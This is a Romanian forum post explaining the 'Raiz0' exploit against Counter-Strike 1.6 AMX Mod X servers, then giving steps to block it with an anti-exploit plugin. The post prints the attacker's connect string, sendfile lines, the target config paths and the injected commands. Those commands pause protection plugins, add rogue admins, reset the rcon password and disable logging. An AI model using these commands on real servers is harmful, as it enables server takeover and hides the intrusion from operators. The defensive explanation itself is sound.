Raiz0 Exploit creaza fisiere cu extensia cfg in care pune diverse linii, aceste linii rescriu anumite setari ale serverului, de exemplu va schimba parola rcon, va dezactiveaza pluginurile care previn o serie de alte exploit-uri.
Pentru a face asta se foloseste de modulul writefile, exemplu :
COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg
Ignoring non-customization file upload of addons\amxmodx\configs\maps\de_nuke_rarea.cfg
Cum functioneaza acest exploit:
Atacatorul se conecteaza la server cu:
….connect 48 1899560584
“\prot\3\unique\-1\raw\steam\cdkey\85f1731996f9844694d90d4aa89ad373″
“\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\0\cl_lc\1\cl_lw\1\cl_updaterate\20\model\arctic\name\Alex\team\topcolor\topcolor\30\_dr\raiz0\_laleagane\raiz0\_anzo\raiz0\_hns\raiz0\translit\1\_pw\test\_gm\0630\lang\pl\autobind\v1.0\rate\20000″
...si va executa configul:
{\rtf1\ansi\ansicpg1250\deff0{\fonttbl{\f0\fnil\fcharset238 Calibri;}{\f1\fnil\fcharset0 Calibri;}}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang1045\f0\fs22 sendfile "addons\\amxmodx\\configs\\exec.cfg"\par
sendfile "maps.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_dust.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_nuke.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_train.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_kabul.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_tuscan.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cbble.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_inferno.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_dust2.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_aztec.cfg"\par
sendfile "addons\\amxmodx\\configs\\exec.cfg"\par
sendfile "addons\\metamod\\exec.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cpl_strike.cfg"\par
sendfile "addons\\amxmodx\\configs\\maps\\de_cpl_strike.cfg"\par
\lang1033\f1\par
}
Dupa care creeaza urmatoarele fisiere (exemplu):
cs/cstrike/addons/amxmodx/configs/maps/de_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby6.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_c00l_f.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_long.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_tuscan.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_vertigo.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_havana.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_perfect_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_zima.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_amr.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul32.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dinaunion.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_arctic.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_eldorado.cfg
cs/cstrike/addons/amxmodx/configs/maps/as_oilrig.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty.cfgl
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs2.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lapp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_romania.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_alexandra.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_epixi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cbble.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_mie.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty2k_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4ever.cfg
cs/cstrike/addons/amxmodx/configs/maps/codex_knife.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno2se.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_india.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_choklad.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_abaddon.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_kolor_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp_alone.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_helvis.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_siege.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_dixor.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustyaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow2k.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_bycastor32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_zigzag.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_purplez.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_backalley.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2006.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_prodigy.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_unreal.cfg
cs/cstrike/addons/amxmodx/configs/maps/css_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cpl_mill_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood_big.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustvsaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_ghosts.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainrun.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke.cfg
cs/cstrike/addons/amxmodx/configs/maps/hnsm_nemesis.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_chateau.cfg
cs/cstrike/addons/amxmodx/configs/maps/31hp_knife_pro.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_airstrip.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_militia.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_piranesi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_industro.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooftops.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_estate.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b1.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault_hotel.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke_rarea.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lime.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby3.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_3h.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_love.cfg
cs/cstrike/addons/metamod/exec.cfg
Aceste fisiere contin setari ca:
amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
amx_addadmin "STEAM_0:0:37841280" "abcdefghijklmnopqrstu"
rcon_password "asd123"
amx_addadmin "HLTV" "abcdefghijklmnopqrstu"
amx_addadmin "STEAM_0:0:1337" "abcdefghijklmnopqrstu"
amx_addadmin "Owner" "" "abcdefghijklmnopqrstu" "a"
motdfile motd.txt
log off
mp_logfile 0
Astfel va schimba parola rcon, va avea acces de administrator si va poate manipula serverul.
rcon 1899560584 “198709871234l0l” say Server hacked by raiz0
Prevenirea atacului cu acest exploit.
* INFO: acest plugin necesita Modul: Orpheu v2.6.3 http://mortall.ro/viewtopic.php?f=46&t=204&p=221#p221
1. ANTI-EXPLOIT
Faceti download la arhiva atasata anti-raiz0-exploit.rar si dezarhivati-o. www.mortall.ro/download/anti-raiz0-exploit.rar
2. INSTALARE
Fisierele:
- engine_i686.so
- file_exploit.cfg
si folderul:
- addons
le adaugati in directorul cstrike.
In fisierul server.cfg daugati textul:exec file_exploit.cfg
Deschideti fisierul plugins.ini (../cstrike/addons/amxmodx/configs/plugins.ini) si adaugati textul:File_exploit_rcon_hack.amxx
Salvati si inchideti fisierul.
> Faceti UPDATE la Dproto la ultima versiune: http://mortall.ro/viewtopic.php?f=45&t=149
* Restart server
Deschideti consola rcon si scrieti meta list pentru a verifica daca sa incarcat modulul Orpheu:
- Orpheu RUN - orpheu_amxx_i386 v2.3
[RGK]*Kent - mortall.ro 